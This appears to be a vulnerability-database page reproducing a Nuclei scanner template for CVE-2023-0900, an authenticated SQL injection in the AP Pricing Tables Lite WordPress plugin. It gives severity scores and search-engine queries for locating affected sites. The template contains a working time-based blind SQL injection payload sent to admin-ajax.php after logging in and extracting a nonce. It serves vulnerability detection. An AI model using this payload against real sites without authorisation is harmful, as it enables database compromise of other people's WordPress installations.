Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-0900
HistoryOct 17, 2023 - 7:20 a.m.

AP Pricing Tables Lite <= 1.1.6 - SQL Injection

2023-10-1707:20:28
ProjectDiscovery
github.com
1
cve2023
sqli
wordpress
wp-plugin
authenticated
wpscan
ap-pricing-tables-lite
wpdevart
severity-high

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

0.012 Low

EPSS

Percentile

85.3%

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
id: CVE-2023-0900

info:
  name: AP Pricing Tables Lite <= 1.1.6 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
  reference:
    - https://wpscan.com/vulnerability/f601e637-a486-4f3a-9077-4f294ace7ea1
    - https://github.com/WPPlugins/ap-pricing-tables-lite
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0900
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-0900
    cwe-id: CWE-89
    epss-score: 0.01291
    epss-percentile: 0.85797
    cpe: cpe:2.3:a:wpdevart:pricing_table_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: wpdevart
    product: pricing_table_builder
    framework: wordpress
    shodan-query: http.html:wp-content/plugins/ap-pricing-tables-lite
    fofa-query: body=wp-content/plugins/ap-pricing-tables-lite
    publicwww-query: "wp-content/plugins/ap-pricing-tables-lite"
  tags: cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded

        action=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_3>=5'
          - 'status_code_3 == 200'
          - 'contains(body_3, "Security check")'
          - 'contains(body_2, "ap-pricing-tables-lite")'
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - '_wpnonce=([0-9a-z]+)">Log Out'
        internal: true
# digest: 4b0a00483046022100bf8e9a00df0f8377907f2df5438b99e4a3d36b85f2938b25de0dc3ae5fa9abab022100f49f5afc99d134805292ba1c0c1f07dc7da7076b0bf9292863ecccbb80e562f7:922c64590222798bb761d5b6d8e72950

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

0.012 Low

EPSS

Percentile

85.3%